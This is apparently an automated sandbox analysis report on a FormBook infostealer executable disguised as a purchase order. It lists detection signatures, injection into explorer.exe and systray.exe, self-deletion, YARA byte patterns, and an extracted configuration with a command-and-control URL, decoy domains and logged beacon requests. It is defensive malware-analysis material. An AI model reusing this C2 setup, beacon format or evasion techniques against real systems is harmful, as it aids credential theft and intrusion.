Analysis Report PO-RFQ # 097663899.exe

Overview

General Information

Sample Name: PO-RFQ # 097663899.exe
Analysis ID: 383978
MD5: 3a480d8d735efe129dcccea48a054721
SHA1: 444f3d7795694fb3fd462b6cf3f5c2776e4a1196
SHA256: 006dcd5baa67723c1d34336ca9d3eb55eb53cdb58999a8c6a3a64b28c2848220
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO-RFQ # 097663899.exe (PID: 5964 cmdline: 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe' MD5: 3A480D8D735EFE129DCCCEA48A054721)
    • PO-RFQ # 097663899.exe (PID: 6336 cmdline: C:\Users\user\Desktop\PO-RFQ # 097663899.exe MD5: 3A480D8D735EFE129DCCCEA48A054721)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 3136 cmdline: /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aquaroyaume.com/uabu/"], "decoy": ["khedutbajar.com", "vehicleporn.com", "misanthropedia.com", "partum.life", "tenshinstore.com", "51tayi.com", "rgr.one", "lattakia-imbiss.com", "escalerasdemetal.com", "nationalurc.info", "prettygalglam.com", "globalperfumery.com", "ivulam.xyz", "qingniang.club", "quick2ulube.com", "curiget.xyz", "ujeiakosdka.com", "lacapitalcaferestaurant.com", "agarkovsport.online", "okashidonya.com", "xiaoqiche.net", "solothrone.com", "anilfw.com", "goindutch.com", "buildaputt.com", "salesenablementlaunch.com", "olympicmeados.com", "fastbetusa.com", "lunaferro.com", "realtimesoption.online", "testci20200817122241.com", "smitaaifoods.com", "farmacyfastfood.com", "hecmportal.net", "24410restiveway.com", "aaeonlineaccess.com", "bigbuddyco.com", "banismobarbersop.com", "protectionguru.pro", "almosting.com", "perspectiveofgains.com", "notebankers.com", "southsidesportsmen.com", "kopebitest.com", "santiagosupermarket.com", "cheap.kim", "testjaycypes01.com", "toyota-africa-starlet.com", "sunsetplazaapts.com", "favrrdrones.com", "mayipay9.com", "ahaal20.com", "capitalsportscenter.com", "betslotgames.com", "thejewelcartel.com", "gangubai-ramukaka.com", "virtualmed101.com", "sersali.com", "oldschoolnews.net", "sparta-mc.online", "enisis.info", "denversoccertraining.com", "everythingkeema.com", "assistancephotographe.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        4.2.PO-RFQ # 097663899.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.PO-RFQ # 097663899.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration)
          Multi AV Scanner detection for submitted file
          Source: PO-RFQ # 097663899.exe, Virustotal: Detection: 30%
          Source: PO-RFQ # 097663899.exe, ReversingLabs: Detection: 27%
          Yara detected FormBook
          Source: Yara match, File source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: PO-RFQ # 097663899.exe, Joe Sandbox ML: detected
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: PO-RFQ # 097663899.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO-RFQ # 097663899.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO-RFQ # 097663899.exe, 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, systray.exe, 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO-RFQ # 097663899.exe, systray.exe

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.aquaroyaume.com/uabu/
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1 Host: www.mayipay9.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1 Host: www.salesenablementlaunch.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1 Host: www.oldschoolnews.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1 Host: www.aquaroyaume.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1 Host: www.globalperfumery.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1 Host: www.kopebitest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1 Host: www.farmacyfastfood.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1 Host: www.bigbuddyco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1 Host: www.agarkovsport.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 198.54.117.218
          Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox View, ASN Name: NFORCENL
          Source: unknown, DNS traffic detected: queries for: www.mayipay9.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Apr 2021 11:31:55 GMT Content-Type: text/html Content-Length: 793 Connection: close
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe, Code function: 4_2_004181C0 NtCreateFile, 4_2_004181C0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00418270 NtReadFile,4_2_00418270
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182F0 NtClose,4_2_004182F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,4_2_004183A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004181BA NtCreateFile,4_2_004181BA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041826A NtReadFile,4_2_0041826A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182EA NtClose,4_2_004182EA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041839A NtAllocateVirtualMemory,4_2_0041839A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00EE98F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_00EE9860
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9840 NtDelayExecution,LdrInitializeThunk,4_2_00EE9840
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95D0 NtClose,LdrInitializeThunk,4_2_00EE95D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99A0 NtCreateSection,LdrInitializeThunk,4_2_00EE99A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9540 NtReadFile,LdrInitializeThunk,4_2_00EE9540
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00EE9910
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00EE96E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00EE9660
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A50 NtCreateFile,LdrInitializeThunk,4_2_00EE9A50
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A20 NtResumeThread,LdrInitializeThunk,4_2_00EE9A20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00EE9A00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9FE0 NtCreateMutant,LdrInitializeThunk,4_2_00EE9FE0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00EE97A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9780 NtMapViewOfSection,LdrInitializeThunk,4_2_00EE9780
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9710 NtQueryInformationToken,LdrInitializeThunk,4_2_00EE9710
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98A0 NtWriteVirtualMemory,4_2_00EE98A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEB040 NtSuspendThread,4_2_00EEB040
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9820 NtEnumerateKey,4_2_00EE9820
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95F0 NtQueryInformationFile,4_2_00EE95F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99D0 NtCreateProcessEx,4_2_00EE99D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9560 NtWriteFile,4_2_00EE9560
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9950 NtQueueApcThread,4_2_00EE9950
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9520 NtWaitForSingleObject,4_2_00EE9520
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEAD30 NtSetContextThread,4_2_00EEAD30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96D0 NtCreateKey,4_2_00EE96D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A80 NtOpenDirectoryObject,4_2_00EE9A80
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9670 NtQueryInformationProcess,4_2_00EE9670
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9650 NtQueryValueKey,4_2_00EE9650
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9610 NtEnumerateValueKey,4_2_00EE9610
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A10 NtQuerySection,4_2_00EE9A10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA3B0 NtGetContextThread,4_2_00EEA3B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9760 NtOpenProcess,4_2_00EE9760
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9770 NtSetInformationFile,4_2_00EE9770
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA770 NtOpenThread,4_2_00EEA770
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9730 NtQueryVirtualMemory,4_2_00EE9730
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9B00 NtSetValueKey,4_2_00EE9B00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA710 NtOpenProcessToken,4_2_00EEA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9540 NtReadFile,LdrInitializeThunk,14_2_050B9540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95D0 NtClose,LdrInitializeThunk,14_2_050B95D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9710 NtQueryInformationToken,LdrInitializeThunk,14_2_050B9710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9780 NtMapViewOfSection,LdrInitializeThunk,14_2_050B9780
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9FE0 NtCreateMutant,LdrInitializeThunk,14_2_050B9FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9650 NtQueryValueKey,LdrInitializeThunk,14_2_050B9650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_050B9660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96D0 NtCreateKey,LdrInitializeThunk,14_2_050B96D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_050B96E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_050B9910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99A0 NtCreateSection,LdrInitializeThunk,14_2_050B99A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9840 NtDelayExecution,LdrInitializeThunk,14_2_050B9840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_050B9860
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A50 NtCreateFile,LdrInitializeThunk,14_2_050B9A50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9520 NtWaitForSingleObject,14_2_050B9520
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BAD30 NtSetContextThread,14_2_050BAD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9560 NtWriteFile,14_2_050B9560
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95F0 NtQueryInformationFile,14_2_050B95F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA710 NtOpenProcessToken,14_2_050BA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9730 NtQueryVirtualMemory,14_2_050B9730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9760 NtOpenProcess,14_2_050B9760
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA770 NtOpenThread,14_2_050BA770
